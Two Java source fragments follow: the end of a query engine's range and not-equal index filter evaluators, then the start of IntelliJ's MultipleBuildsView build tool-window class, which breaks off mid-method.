implements Filter {
final Set notEqualTypeKeys;
final IndexInfo indxInfo;
/**
*
* @param notEqualTypeKeys
* java.util.Set object containing the keys of the 'NOT
* EQUAL' type conditions (e.g. a != 3 and a != 5). For
* DoubleCondnRangeJunctionEvaluator, this may be null.
* @param indxInfo
* The IndexInfo object corresponding to the RangeJunction
*/
NotEqualConditionEvaluator(Set notEqualTypeKeys, IndexInfo indxInfo) {
this.notEqualTypeKeys = notEqualTypeKeys;
this.indxInfo = indxInfo;
}
@Override
public SelectResults filterEvaluate(ExecutionContext context,
SelectResults iterationLimit) throws FunctionDomainException,
TypeMismatchException, NameResolutionException,
QueryInvocationTargetException {
throw new UnsupportedOperationException();
}
@Override
public SelectResults filterEvaluate(ExecutionContext context,
SelectResults iterationLimit, boolean completeExpansionNeeded,
CompiledValue iterOperands, RuntimeIterator[] indpndntItrs, boolean isIntersection,boolean conditioningNeeded, boolean evalProj)
throws FunctionDomainException, TypeMismatchException,
NameResolutionException, QueryInvocationTargetException {
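// Overall flow: pick a result collection matching the index result type
// (struct vs. plain, linked/sorted when an order-by can be applied at the
// index), run the index lookup for the not-equal keys under the query
// observer, then condition/expand the raw index results as required.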
ObjectType resultType = this.indxInfo._index.getResultSetType();
int indexFieldsSize = -1;
SelectResults set = null;
Boolean orderByClause = (Boolean)context.cacheGet(CompiledValue.CAN_APPLY_ORDER_BY_AT_INDEX);
boolean useLinkedDataStructure = false;
boolean nullValuesAtStart = true;
if(orderByClause != null && orderByClause.booleanValue()) {
List orderByAttrs = (List)context.cacheGet(CompiledValue.ORDERBY_ATTRIB);
useLinkedDataStructure =orderByAttrs.size()==1;
nullValuesAtStart = !((CompiledSortCriterion)orderByAttrs.get(0)).getCriterion();
}
if (resultType instanceof StructType) {
if (context.getCache().getLogger().fineEnabled()) {
context.getCache().getLogger().fine(
"StructType resultType.class=" + resultType.getClass().getName());
}
if (useLinkedDataStructure) {
set = context.isDistinct() ? new LinkedStructSet((StructTypeImpl)resultType)
: new SortedResultsBag<Struct>((StructTypeImpl)resultType, nullValuesAtStart);
} else {
set = QueryUtils.createStructCollection(context, (StructTypeImpl)resultType) ;
}
indexFieldsSize = ((StructTypeImpl)resultType).getFieldNames().length;
}
else {
if (context.getCache().getLogger().fineEnabled()) {
context.getCache().getLogger().fine(
"non-StructType resultType.class="
+ resultType.getClass().getName());
}
if (useLinkedDataStructure) {
set = context.isDistinct() ? new LinkedResultSet(resultType) : new SortedResultsBag(resultType,
nullValuesAtStart);
} else {
set = QueryUtils.createResultCollection(context, resultType);
}
indexFieldsSize = 1;
}
// actual index lookup
QueryObserver observer = QueryObserverHolder.getInstance();
/*
* Asif: First obtain the match level of the index result set. If the match
* level happens to be zero, this implies that we just have to change the
* StructType (again, only if the index result set is a StructBag). If the
* match level is zero and the expand-to-top-level flag is true, then only
* if the total number of iterators in the current scope is greater than the
* number of fields in the StructBag do we need to do any expansion.
*
*/
try {
observer.beforeIndexLookup(this.indxInfo._index,
OQLLexerTokenTypes.TOK_NE, this.notEqualTypeKeys);
context.cachePut(CompiledValue.INDEX_INFO, this.indxInfo);
this.indxInfo._index.query(set, notEqualTypeKeys, context);
}
finally {
observer.afterIndexLookup(set);
}
return QueryUtils.getconditionedIndexResults(set, this.indxInfo, context,
indexFieldsSize, completeExpansionNeeded, iterOperands, indpndntItrs);
}
@Override
public SelectResults auxFilterEvaluate(ExecutionContext context,
SelectResults intermediateResults) throws FunctionDomainException,
TypeMismatchException, NameResolutionException,
QueryInvocationTargetException {
throw new UnsupportedOperationException();
}
public Object evaluate(ExecutionContext context) throws FunctionDomainException, TypeMismatchException, NameResolutionException, QueryInvocationTargetException {
Object evaluatedPath = this.indxInfo._path.evaluate(context);
return evaluate(context,evaluatedPath);
}
public boolean isConditioningNeededForIndex(RuntimeIterator independentIter, ExecutionContext context, boolean completeExpnsNeeded) throws AmbiguousNameException, TypeMismatchException, NameResolutionException {
return true;
}
public Object evaluate(ExecutionContext context, Object evaluatedPath) throws FunctionDomainException, TypeMismatchException, NameResolutionException, QueryInvocationTargetException {
Iterator itr = this.notEqualTypeKeys.iterator();
while(itr.hasNext()) {
Object val = itr.next();
Object result = TypeUtils.compare(evaluatedPath, val, TOK_NE);
if( result instanceof Boolean) {
if( !((Boolean)result).booleanValue()) {
return Boolean.FALSE;
}
}else {
throw new TypeMismatchException("NotEqualConditionEvaluator should evaluate to boolean type");
}
}
return Boolean.TRUE;
}
public int getType() {
return NOTEQUALCONDITIONEVALUATOR;
}
public int getSizeEstimate(ExecutionContext context) {
return RANGE_SIZE_ESTIMATE;
}
@Override
public void visitNodes(NodeVisitor visitor) {
Support.assertionFailed("Should not have come here");
}
public int getOperator()
{
return LITERAL_and;
}
public boolean isBetterFilter(Filter comparedTo, ExecutionContext context, int thisSize) throws FunctionDomainException, TypeMismatchException, NameResolutionException, QueryInvocationTargetException
{
// If the current filter is equality based and the comparedTo filter is also equality based,
// then the one with the lower size estimate is the better one.
boolean isThisBetter = true;
int thatOperator = comparedTo.getOperator() ;
// Go with the lowest cost when a hint is used.
if (context instanceof QueryExecutionContext && ((QueryExecutionContext)context).hasHints()) {
return thisSize <= comparedTo.getSizeEstimate(context);
}
switch(thatOperator) {
case TOK_EQ:
isThisBetter = false;
break;
case TOK_NE:
case TOK_NE_ALT:
//Give preference to Range
break;
default :
throw new IllegalArgumentException("The operator type ="+ thatOperator + " is unknown");
}
return isThisBetter;
}
}
/**
* Filter object of this type gets created if there exists at least one "NOT
* EQUAL" type condition and a single condition containing an inequality of
* type 'Less' or 'Greater'. The where clause may actually contain multiple
* 'Less' type inequalities or multiple 'Greater' type inequalities (though not
* both 'Less' and 'Greater' together). The RangeJunction will identify the
* most specific inequality for the AND junction; thus something like a &gt; 7
* and a &gt;= 6 will be sufficiently represented by a &gt; 7.
*
* @author asif
*
*/
private static class SingleCondnEvaluator extends NotEqualConditionEvaluator {
protected int condnOp = -1;
protected final Object condnKey;
@Override
public SelectResults filterEvaluate(ExecutionContext context,
SelectResults iterationLimit) throws FunctionDomainException,
TypeMismatchException, NameResolutionException,
QueryInvocationTargetException {
throw new UnsupportedOperationException();
}
/**
*
* @param operator
* integer identifying the type of 'Less' or 'Greater'
* inequality
* @param key
* Object representing the Key for the inequality
* @param notEqualKeys
* Set containing the 'NOT EQUAL' Keys accompanying the
* 'Less' or 'Greater' inequality
* @param indxInfo
* The IndexInfo object corresponding to the RangeJunction
*/
SingleCondnEvaluator(int operator, Object key, Set notEqualKeys,
IndexInfo indxInfo) {
super(notEqualKeys, indxInfo);
this.condnOp = operator;
this.condnKey = key;
}
@Override
public SelectResults filterEvaluate(ExecutionContext context,
SelectResults iterationLimit, boolean completeExpansionNeeded,
CompiledValue iterOperands, RuntimeIterator[] indpndntItrs,
boolean isIntersection,boolean conditioningNeeded, boolean evalProj)
throws FunctionDomainException, TypeMismatchException,
NameResolutionException, QueryInvocationTargetException {
ObjectType resultType = this.indxInfo._index.getResultSetType();
int indexFieldsSize = -1;
SelectResults set = null;
Boolean orderByClause = (Boolean)context.cacheGet(CompiledValue.CAN_APPLY_ORDER_BY_AT_INDEX);
boolean useLinkedDataStructure = false;
boolean nullValuesAtStart = true;
if(orderByClause != null && orderByClause.booleanValue()) {
List orderByAttrs = (List)context.cacheGet(CompiledValue.ORDERBY_ATTRIB);
useLinkedDataStructure =orderByAttrs.size()==1;
nullValuesAtStart = !((CompiledSortCriterion)orderByAttrs.get(0)).getCriterion();
}
if (resultType instanceof StructType) {
if (context.getCache().getLogger().fineEnabled()) {
context.getCache().getLogger().fine(
"StructType resultType.class=" + resultType.getClass().getName());
}
if (useLinkedDataStructure) {
set = context.isDistinct() ? new LinkedStructSet((StructTypeImpl)resultType)
: new SortedResultsBag<Struct>((StructTypeImpl)resultType, nullValuesAtStart);
} else {
set = QueryUtils.createStructCollection(context, (StructTypeImpl)resultType) ;
}
indexFieldsSize = ((StructTypeImpl)resultType).getFieldNames().length;
}
else {
if (context.getCache().getLogger().fineEnabled()) {
context.getCache().getLogger().fine(
"non-StructType resultType.class="
+ resultType.getClass().getName());
}
if (useLinkedDataStructure) {
set = context.isDistinct() ? new LinkedResultSet(resultType) : new SortedResultsBag(resultType,
nullValuesAtStart);
} else {
set = QueryUtils.createResultCollection(context, resultType);
}
indexFieldsSize = 1;
}
// actual index lookup
QueryObserver observer = QueryObserverHolder.getInstance();
/*
* Asif: First obtain the match level of the index result set. If the match
* level happens to be zero, this implies that we just have to change the
* StructType (again, only if the index result set is a StructBag). If the
* match level is zero and the expand-to-top-level flag is true, then only
* if the total number of iterators in the current scope is greater than the
* number of fields in the StructBag do we need to do any expansion.
*
*/
try {
observer.beforeIndexLookup(this.indxInfo._index, this.condnOp,
this.condnKey);
context.cachePut(CompiledValue.INDEX_INFO, this.indxInfo);
this.indxInfo._index.query(this.condnKey, this.condnOp, set,
notEqualTypeKeys, context);
}
finally {
observer.afterIndexLookup(set);
}
return QueryUtils.getconditionedIndexResults(set, this.indxInfo, context,
indexFieldsSize, completeExpansionNeeded, iterOperands, indpndntItrs);
}
public Object evaluate(ExecutionContext context) throws TypeMismatchException, FunctionDomainException, NameResolutionException, QueryInvocationTargetException {
Object evaluatedPath = this.indxInfo._path.evaluate(context);
Boolean result =(Boolean) super.evaluate(context,evaluatedPath);
if( result.booleanValue()) {
result = (Boolean)TypeUtils.compare(evaluatedPath, this.condnKey, this.condnOp);
}
return result;
}
@Override
public int getType() {
return SINGLECONDNEVALUATOR;
}
@Override
public void visitNodes(NodeVisitor visitor) {
Support.assertionFailed("Should not have come here");
}
@Override
public SelectResults auxFilterEvaluate(ExecutionContext context,
SelectResults intermediateResults) throws FunctionDomainException,
TypeMismatchException, NameResolutionException,
QueryInvocationTargetException {
throw new UnsupportedOperationException();
}
}
/**
* Filter object of this type gets created if there exists a bounded condition
* like a &gt; 7 and a &gt; 8 and a &lt; 10 and a &lt; 11. The RangeJunction
* will identify the most specific inequality of each type for the AND junction.
* Thus the conditions a &gt; 8 and a &lt; 10 will be used to form the object of
* this class. For this evaluator only, the notEqualTypeKeys field present in
* its superclass may be null (if there is no 'NOT EQUAL' type condition
* satisfying the bounded condition).
*
* @author ashahid
*
*/
private static class DoubleCondnRangeJunctionEvaluator extends
NotEqualConditionEvaluator {
protected final int lessCondnOp;
protected final int greaterCondnOp;
protected final Object lessCondnKey;
protected final Object greaterCondnKey;
/**
*
* @param lessCondnOp
* integer identifying the upper bound ( < or <= )
* @param lessCondnKey
* Object representing the Upper Bound Key
* @param greaterCondnOp
* integer identifying the lower bound ( > or >= )
* @param greaterCondnKey
* Object representing the lower Bound Key
* @param notEqualTypeKeys
* Set containing the 'NOT EQUAL' Keys accompanying the
* 'Less' or 'Greater' inequality
* @param indexInfo
* The IndexInfo object corresponding to the RangeJunction
*/
DoubleCondnRangeJunctionEvaluator(int lessCondnOp, Object lessCondnKey,
int greaterCondnOp, Object greaterCondnKey, Set notEqualTypeKeys,
IndexInfo indexInfo) {
super(notEqualTypeKeys, indexInfo);
this.lessCondnOp = lessCondnOp;
this.lessCondnKey = lessCondnKey;
this.greaterCondnOp = greaterCondnOp;
this.greaterCondnKey = greaterCondnKey;
}
@Override
public SelectResults filterEvaluate(ExecutionContext context,
SelectResults iterationLimit) throws FunctionDomainException,
TypeMismatchException, NameResolutionException,
QueryInvocationTargetException {
throw new UnsupportedOperationException();
}
@Override
public SelectResults filterEvaluate(ExecutionContext context,
SelectResults iterationLimit, boolean completeExpansionNeeded,
CompiledValue iterOperands, RuntimeIterator[] indpndntItrs,
boolean isIntersection,boolean conditioningNeeded, boolean evalProj)
throws FunctionDomainException, TypeMismatchException,
NameResolutionException, QueryInvocationTargetException {
ObjectType resultType = this.indxInfo._index.getResultSetType();
int indexFieldsSize = -1;
SelectResults set = null;
Boolean orderByClause = (Boolean)context.cacheGet(CompiledValue.CAN_APPLY_ORDER_BY_AT_INDEX);
boolean useLinkedDataStructure = false;
boolean nullValuesAtStart = true;
if(orderByClause != null && orderByClause.booleanValue()) {
List orderByAttrs = (List)context.cacheGet(CompiledValue.ORDERBY_ATTRIB);
useLinkedDataStructure =orderByAttrs.size()==1;
nullValuesAtStart = !((CompiledSortCriterion)orderByAttrs.get(0)).getCriterion();
}
if (resultType instanceof StructType) {
if (context.getCache().getLogger().fineEnabled()) {
context.getCache().getLogger().fine(
"StructType resultType.class=" + resultType.getClass().getName());
}
if(useLinkedDataStructure) {
set = context.isDistinct() ? new LinkedStructSet((StructTypeImpl)resultType)
: new SortedResultsBag<Struct>((StructTypeImpl)resultType, nullValuesAtStart);
}else {
set = QueryUtils.createStructCollection(context, (StructTypeImpl)resultType) ;
}
indexFieldsSize = ((StructTypeImpl)resultType).getFieldNames().length;
}
else {
if (context.getCache().getLogger().fineEnabled()) {
context.getCache().getLogger().fine(
"non-StructType resultType.class="
+ resultType.getClass().getName());
}
if (useLinkedDataStructure) {
set = context.isDistinct() ? new LinkedResultSet(resultType):
new SortedResultsBag(resultType, nullValuesAtStart);
} else {
set = QueryUtils.createResultCollection(context, resultType);
}
indexFieldsSize = 1;
}
// actual index lookup
// Shobhit: The limit cannot be applied at the index level for a RangeJunction, as
// the other conditions are applied after coming out of the index query method.
context.cachePut(CompiledValue.CAN_APPLY_LIMIT_AT_INDEX, Boolean.FALSE);
QueryObserver observer = QueryObserverHolder.getInstance();
/*
* Asif: First obtain the match level of the index result set. If the match
* level happens to be zero, this implies that we just have to change the
* StructType (again, only if the index result set is a StructBag). If the
* match level is zero and the expand-to-top-level flag is true, then only
* if the total number of iterators in the current scope is greater than the
* number of fields in the StructBag do we need to do any expansion.
*
*/
try {
observer.beforeIndexLookup(this.indxInfo._index, this.greaterCondnOp,
this.greaterCondnKey, this.lessCondnOp, this.lessCondnKey,
this.notEqualTypeKeys);
context.cachePut(CompiledValue.INDEX_INFO, this.indxInfo);
this.indxInfo._index.query(this.greaterCondnKey, this.greaterCondnOp,
this.lessCondnKey, this.lessCondnOp, set, notEqualTypeKeys, context);
}
finally {
observer.afterIndexLookup(set);
}
return QueryUtils.getconditionedIndexResults(set, this.indxInfo, context,
indexFieldsSize, completeExpansionNeeded, iterOperands, indpndntItrs);
}
@Override
public SelectResults auxFilterEvaluate(ExecutionContext context,
SelectResults intermediateResults) throws FunctionDomainException,
TypeMismatchException, NameResolutionException,
QueryInvocationTargetException {
throw new UnsupportedOperationException();
}
public Object evaluate(ExecutionContext context) throws FunctionDomainException, TypeMismatchException, NameResolutionException, QueryInvocationTargetException {
Object evaluatedPath = this.indxInfo._path.evaluate(context);
Boolean result =(Boolean) super.evaluate(context,evaluatedPath);
if( result.booleanValue()) {
result = (Boolean)TypeUtils.compare(evaluatedPath, this.lessCondnKey, this.lessCondnOp);
result = result.booleanValue() ? (Boolean)TypeUtils.compare(evaluatedPath, this.greaterCondnKey, this.greaterCondnOp):Boolean.FALSE;
}
return result;
}
@Override
public int getType() {
return DOUBLECONDNRANGEJUNCTIONEVALUATOR;
}
@Override
public void visitNodes(NodeVisitor visitor) {
Support.assertionFailed("Should not have come here");
}
}
}
// Copyright 2000-2020 JetBrains s.r.o. Use of this source code is governed by the Apache 2.0 license that can be found in the LICENSE file.
package com.intellij.build;
import com.intellij.build.events.*;
import com.intellij.execution.process.AnsiEscapeDecoder;
import com.intellij.execution.process.ProcessOutputTypes;
import com.intellij.execution.ui.RunContentDescriptor;
import com.intellij.ide.IdeBundle;
import com.intellij.ide.OccurenceNavigator;
import com.intellij.openapi.Disposable;
import com.intellij.openapi.actionSystem.ActionManager;
import com.intellij.openapi.actionSystem.ActionToolbar;
import com.intellij.openapi.actionSystem.DefaultActionGroup;
import com.intellij.openapi.diagnostic.Logger;
import com.intellij.openapi.project.Project;
import com.intellij.openapi.ui.OnePixelDivider;
import com.intellij.openapi.util.Disposer;
import com.intellij.openapi.util.Pair;
import com.intellij.openapi.wm.ToolWindow;
import com.intellij.ui.OnePixelSplitter;
import com.intellij.ui.SimpleColoredComponent;
import com.intellij.ui.SimpleTextAttributes;
import com.intellij.ui.components.JBList;
import com.intellij.ui.components.JBScrollPane;
import com.intellij.ui.content.Content;
import com.intellij.ui.content.impl.ContentImpl;
import com.intellij.util.Alarm;
import com.intellij.util.SmartList;
import com.intellij.util.concurrency.EdtExecutorService;
import com.intellij.util.containers.ContainerUtil;
import com.intellij.util.ui.EmptyIcon;
import com.intellij.util.ui.JBUI;
import com.intellij.util.ui.UIUtil;
import org.jetbrains.annotations.ApiStatus;
import org.jetbrains.annotations.NonNls;
import org.jetbrains.annotations.NotNull;
import org.jetbrains.annotations.Nullable;
import javax.swing.*;
import javax.swing.event.ListSelectionEvent;
import javax.swing.event.ListSelectionListener;
import java.awt.*;
import java.util.List;
import java.util.*;
import java.util.concurrent.ConcurrentHashMap;
import java.util.concurrent.TimeUnit;
import java.util.concurrent.atomic.AtomicBoolean;
import java.util.function.Function;
import java.util.function.Supplier;
import java.util.stream.IntStream;
/**
* @author Vladislav.Soroka
*/
@ApiStatus.Experimental
public class MultipleBuildsView implements BuildProgressListener, Disposable {
private static final Logger LOG = Logger.getInstance(MultipleBuildsView.class);
@NonNls private static final String SPLITTER_PROPERTY = "MultipleBuildsView.Splitter.Proportion";
protected final Project myProject;
protected final BuildContentManager myBuildContentManager;
private final AtomicBoolean isInitializeStarted;
private final AtomicBoolean isFirstErrorShown = new AtomicBoolean();
private final List<Runnable> myPostponedRunnables;
private final ProgressWatcher myProgressWatcher;
private final OnePixelSplitter myThreeComponentsSplitter;
private final JBList<AbstractViewManager.BuildInfo> myBuildsList;
private final Map<Object, AbstractViewManager.BuildInfo> myBuildsMap;
private final Map<AbstractViewManager.BuildInfo, BuildView> myViewMap;
private final AbstractViewManager myViewManager;
private volatile Content myContent;
private volatile DefaultActionGroup myToolbarActions;
private volatile boolean myDisposed;
public MultipleBuildsView(Project project,
BuildContentManager buildContentManager,
AbstractViewManager viewManager) {
myProject = project;
myBuildContentManager = buildContentManager;
myViewManager = viewManager;
isInitializeStarted = new AtomicBoolean();
myPostponedRunnables = ContainerUtil.createConcurrentList();
myThreeComponentsSplitter = new OnePixelSplitter(SPLITTER_PROPERTY, 0.25f);
myBuildsList = new JBList<>();
myBuildsList.setModel(new DefaultListModel<>());
myBuildsList.setFixedCellHeight(UIUtil.LIST_FIXED_CELL_HEIGHT * 2);
AnsiEscapeDecoder ansiEscapeDecoder = new AnsiEscapeDecoder();
myBuildsList.installCellRenderer(obj -> {
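// Each list cell shows the build title and message on the first line and, when
// present, an ANSI-decoded status message on a second line below it.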
JPanel panel = new JPanel(new BorderLayout());
SimpleColoredComponent mainComponent = new SimpleColoredComponent();
mainComponent.setIcon(obj.getIcon());
mainComponent.append(obj.getTitle() + ": ", SimpleTextAttributes.REGULAR_BOLD_ATTRIBUTES);
mainComponent.append(obj.message, SimpleTextAttributes.REGULAR_ATTRIBUTES);
panel.add(mainComponent, BorderLayout.NORTH);
if (obj.statusMessage != null) {
SimpleColoredComponent statusComponent = new SimpleColoredComponent();
statusComponent.setIcon(EmptyIcon.ICON_16);
ansiEscapeDecoder.escapeText(obj.statusMessage, ProcessOutputTypes.STDOUT, (text, attributes) -> {
statusComponent.append(text, SimpleTextAttributes.REGULAR_ATTRIBUTES); //NON-NLS
});
panel.add(statusComponent, BorderLayout.SOUTH);
}
return panel;
});
myViewMap = new ConcurrentHashMap<>();
myBuildsMap = new ConcurrentHashMap<>();
myProgressWatcher = new ProgressWatcher();
}
@Override
public void dispose() {
myDisposed = true;
}
public Content getContent() {
return myContent;
}
public Map<BuildDescriptor, BuildView> getBuildsMap() {
return Collections.unmodifiableMap(myViewMap);
}
public boolean shouldConsume(@NotNull Object buildId) {
return myBuildsMap.containsKey(buildId);
}
@Override
public void onEvent(@NotNull Object buildId, @NotNull BuildEvent event) {
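// Collect all UI updates for this event into runOnEdt; while the build content
// has not been created yet they are postponed (myPostponedRunnables) and the
// view is lazily initialized on the EDT.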
List<Runnable> runOnEdt = new SmartList<>();
AbstractViewManager.BuildInfo buildInfo;
if (event instanceof StartBuildEvent) {
StartBuildEvent startBuildEvent = (StartBuildEvent)event;
if (isInitializeStarted.get()) {
clearOldBuilds(runOnEdt, startBuildEvent);
}
buildInfo = new AbstractViewManager.BuildInfo(((StartBuildEvent)event).getBuildDescriptor());
myBuildsMap.put(buildId, buildInfo);
}
else {
buildInfo = myBuildsMap.get(buildId);
}
if (buildInfo == null) {
LOG.warn("Build can not be found for buildId: '" + buildId + "'");
return;
}
runOnEdt.add(() -> {
if (event instanceof StartBuildEvent) {
buildInfo.message = event.getMessage();
DefaultListModel<AbstractViewManager.BuildInfo> listModel =
(DefaultListModel<AbstractViewManager.BuildInfo>)myBuildsList.getModel();
listModel.addElement(buildInfo);
RunContentDescriptor contentDescriptor;
Supplier<? extends RunContentDescriptor> contentDescriptorSupplier = buildInfo.getContentDescriptorSupplier();
contentDescriptor = contentDescriptorSupplier != null ? contentDescriptorSupplier.get() : null;
final Runnable activationCallback;
if (contentDescriptor != null) {
buildInfo.setActivateToolWindowWhenAdded(contentDescriptor.isActivateToolWindowWhenAdded());
if (contentDescriptor instanceof BuildContentDescriptor) {
buildInfo.setActivateToolWindowWhenFailed(((BuildContentDescriptor)contentDescriptor).isActivateToolWindowWhenFailed());
}
buildInfo.setAutoFocusContent(contentDescriptor.isAutoFocusContent());
activationCallback = contentDescriptor.getActivationCallback();
}
else {
activationCallback = null;
}
BuildView view = myViewMap.computeIfAbsent(buildInfo, info -> {
String selectionStateKey = "build.toolwindow." + myViewManager.getViewName() + ".selection.state";
BuildView buildView = new BuildView(myProject, buildInfo, selectionStateKey, myViewManager);
Disposer.register(this, buildView);
if (contentDescriptor != null) {
Disposer.register(buildView, contentDescriptor);
}
return buildView;
});
view.onEvent(buildId, event);
myContent.setPreferredFocusedComponent(view::getPreferredFocusableComponent);
myBuildContentManager.setSelectedContent(myContent,
buildInfo.isAutoFocusContent(),
buildInfo.isAutoFocusContent(),
buildInfo.isActivateToolWindowWhenAdded(),
activationCallback);
buildInfo.content = myContent;
if (myThreeComponentsSplitter.getSecondComponent() == null) {
myThreeComponentsSplitter.setSecondComponent(view);
myViewManager.configureToolbar(myToolbarActions, this, view);
}
if (myBuildsList.getModel().getSize() > 1) {
JBScrollPane scrollPane = new JBScrollPane();
scrollPane.setBorder(JBUI.Borders.empty());
scrollPane.setViewportView(myBuildsList);
myThreeComponentsSplitter.setFirstComponent(scrollPane);
myBuildsList.setVisible(true);
myBuildsList.setSelectedIndex(0);
for (BuildView consoleView : myViewMap.values()) {
BuildTreeConsoleView buildConsoleView = consoleView.getView(BuildTreeConsoleView.class.getName(), BuildTreeConsoleView.class);
if (buildConsoleView != null) {
buildConsoleView.hideRootNode();
}
}
}
else {
myThreeComponentsSplitter.setFirstComponent(null);
}
myViewManager.onBuildStart(buildInfo);
myProgressWatcher.addBuild(buildInfo);
((BuildContentManagerImpl)myBuildContentManager).startBuildNotified(buildInfo, buildInfo.content, buildInfo.getProcessHandler());
}
else {
if (!isFirstErrorShown.get() &&
((event instanceof FinishEvent && ((FinishEvent)event).getResult() instanceof FailureResult) ||
(event instanceof MessageEvent && ((MessageEvent)event).getResult().getKind() == MessageEvent.Kind.ERROR))) {
if (isFirstErrorShown.compareAndSet(false, true)) {
ListModel<AbstractViewManager.BuildInfo> listModel = myBuildsList.getModel();
IntStream.range(0, listModel.getSize())
.filter(i -> buildInfo == listModel.getElementAt(i))
.findFirst()
.ifPresent(myBuildsList::setSelectedIndex);
}
}
BuildView view = myViewMap.get(buildInfo);
if (view != null) {
view.onEvent(buildId, event);
}
if (event instanceof FinishBuildEvent) {
buildInfo.endTime = event.getEventTime();
buildInfo.message = event.getMessage();
buildInfo.result = ((FinishBuildEvent)event).getResult();
myProgressWatcher.stopBuild(buildInfo);
((BuildContentManagerImpl)myBuildContentManager).finishBuildNotified(buildInfo, buildInfo.content);
myViewManager.onBuildFinish(buildInfo);
}
else {
buildInfo.statusMessage = event.getMessage();
}
}
});
if (myContent == null) {
myPostponedRunnables.addAll(runOnEdt);
if (isInitializeStarted.compareAndSet(false, true)) {
EdtExecutorService.getInstance().execute(() -> {
if (myDisposed) return;
myBuildsList.setSelectionMode(ListSelectionModel.SINGLE_SELECTION);
myBuildsList.addListSelectionListener(new ListSelectionListener() {
@Override
public void valueChanged(ListSelectionEvent e) {
AbstractViewManager.BuildInfo selectedBuild = myBuildsList.getSelectedValue();
if (selectedBuild == null) return;
BuildView view = myViewMap.get(selectedBuild);
JComponent lastComponent = myThreeComponentsSplitter.getSecondComponent();
if (view != null && lastComponent != view.getComponent()) {
myThreeComponentsSplitter.setSecondComponent(view.getComponent());
view.getComponent().setVisible(true);
if (lastComponent != null) {
lastComponent.setVisible(false);
}
myViewManager.configureToolbar(myToolbarActions, MultipleBuildsView.this, view);
view.getComponent().repaint();
}
}
});
final JComponent consoleComponent = new MultipleBuildsPanel();
consoleComponent.add(myThreeComponentsSplitter, BorderLayout.CENTER);
myToolbarActions = new DefaultActionGroup();
ActionToolbar tb = ActionManager.getInstance().createActionToolbar("BuildView", myToolbarActions, false);
tb.setTargetComponent(consoleComponent);
tb.getComponent().setBorder(JBUI.Borders.merge(tb.getComponent().getBorder(), JBUI.Borders.customLine(OnePixelDivider.BACKGROUND, 0, 0, 0, 1), true));
consoleComponent.add(tb.getComponent(), BorderLayout.WEST);
myContent = new ContentImpl(consoleComponent, myViewManager.getViewName(), true);
Disposer.register(myContent, new Disposable() {
@Override
public void dispose() {
Disposer.dispose(MultipleBuildsView.this);
}
});
Disposer.register(myContent, new Disposable() {
@Override
public void dispose() {
myViewManager.onBuildsViewRemove(MultipleBuildsView.this);
}
});
Icon contentIcon = myViewManager.getContentIcon();
if (contentIcon != null) {
myContent.setIcon(contentIcon);
myContent.putUserData(ToolWindow.SHOW_CONTENT_ICON, Boolean.TRUE);
}
myBuildContentManager.addContent(myContent);
List<Runnable> postponedRunnables = new ArrayList<>(myPostponedRunnables);
myPostponedRunnables.clear();
for (Runnable postponedRunnable : postponedRunnables) {
postponedRunnable.run();
}
});
}
}
else {
EdtExecutorService.getInstance().execute(() -> {
if (myDisposed) return;
for (Runnable runnable : runOnEdt) {
runnable.run();
}
});
}
}
private void clearOldBuilds(List<Runnable> runOnEdt, StartBuildEvent startBuildEvent) {
long currentTime = System.currentTimeMillis();
DefaultListModel<AbstractViewManager.BuildInfo> listModel = (DefaultListModel<AbstractViewManager.BuildInfo>)myBuildsList.getModel();
boolean clearAll = !listModel.isEmpty();
List<AbstractViewManager.BuildInfo> sameBuildsToClear = new SmartList<>();
for (int i = 0; i < listModel.getSize(); i++) {
AbstractViewManager.BuildInfo build = listModel.getElementAt(i);
boolean sameBuild = build.getWorkingDir().equals(startBuildEvent.getBuildDescriptor().getWorkingDir());
if (!build.isRunning() && sameBuild) {
sameBuildsToClear.add(build);
}
boolean buildFinishedRecently = currentTime - build.endTime < TimeUnit.SECONDS.toMillis(1);
if (build.isRunning() || !sameBuild && buildFinishedRecently) {
clearAll = false;
}
}
if (clearAll) {
myBuildsMap.clear();
SmartList<BuildView> viewsToDispose = new SmartList<>(myViewMap.values());
runOnEdt.add(() -> viewsToDispose.forEach(Disposer::dispose));
myViewMap.clear();
listModel.clear();
runOnEdt.add(() -> {
myBuildsList.setVisible(false);
myThreeComponentsSplitter.setFirstComponent(null);
myThreeComponentsSplitter.setSecondComponent(null);
});
myToolbarActions.removeAll();
isFirstErrorShown.set(false);
}
else {
sameBuildsToClear.forEach(info -> {
BuildView buildView = myViewMap.remove(info);
if (buildView != null) {
runOnEdt.add(() -> Disposer.dispose(buildView));
}
listModel.removeElement(info);
});
}
}
@ApiStatus.Internal
public BuildView getBuildView(Object buildId) {
AbstractViewManager.BuildInfo buildInfo = myBuildsMap.get(buildId);
if (buildInfo == null) return null;
return myViewMap.get(buildInfo);
}
private class MultipleBuildsPanel extends JPanel implements OccurenceNavigator {
MultipleBuildsPanel() {super(new BorderLayout());}
@Override
public boolean hasNextOccurence() {
return getOccurenceNavigator(true) != null;
}
private @Nullable Pair<Integer, Supplier<OccurenceInfo>> getOccurenceNavigator(boolean next) {
if (myBuildsList.getItemsCount() == 0) return null;
int index = Math.max(myBuildsList.getSelectedIndex(), 0);
Function<Integer, Pair<Integer, Supplier<OccurenceInfo>>> function = i -> {
AbstractViewManager.BuildInfo buildInfo = myBuildsList.getModel().getElementAt(i);
BuildView buildView = myViewMap.get(buildInfo);
if (buildView == null) return null;
if (i != index) {
BuildTreeConsoleView eventView = buildView.getEventView();
if (eventView == null) return null;
eventView.getTree().clearSelection();
}
if (next) {
if (buildView.hasNextOccurence()) return Pair.create(i, buildView::goNextOccurence);
}
else {
if (buildView.hasPreviousOccurence()) {
return Pair.create(i, buildView::goPreviousOccurence);
}
else if (i != index && buildView.hasNextOccurence()) {
return Pair.create(i, buildView::goNextOccurence);
}
}
return null;
};
if (next) {
for (int i = index; i < myBuildsList.getItemsCount(); i++) {
Pair<Integer, Supplier<OccurenceInfo>> buildViewPair = function.apply(i);
if (buildViewPair != null) return buildViewPair;
}
}
else {
for (int i = index; i >= 0; i--) {
Pair<Integer, Supplier<OccurenceInfo>> buildViewPair = function.apply(i);
if (buildViewPair != null) return buildViewPair;
}
}
return null;
}
@Override
public boolean hasPreviousOccurence() {
return getOccurenceNavigator(false) != null;
}
@Override
public OccurenceInfo goNextOccurence() {
Pair<Integer, Supplier<OccurenceInfo>> navigator = getOccurenceNavigator(true);
if (navigator != null) {
myBuildsList.setSelectedIndex(navigator.first);
return navigator.second.get();
}
return null;
}
@Override
public OccurenceInfo goPreviousOccurence() {
Pair<Integer, Supplier<OccurenceInfo>> navigator = getOccurenceNavigator(false);
if (navigator != null) {
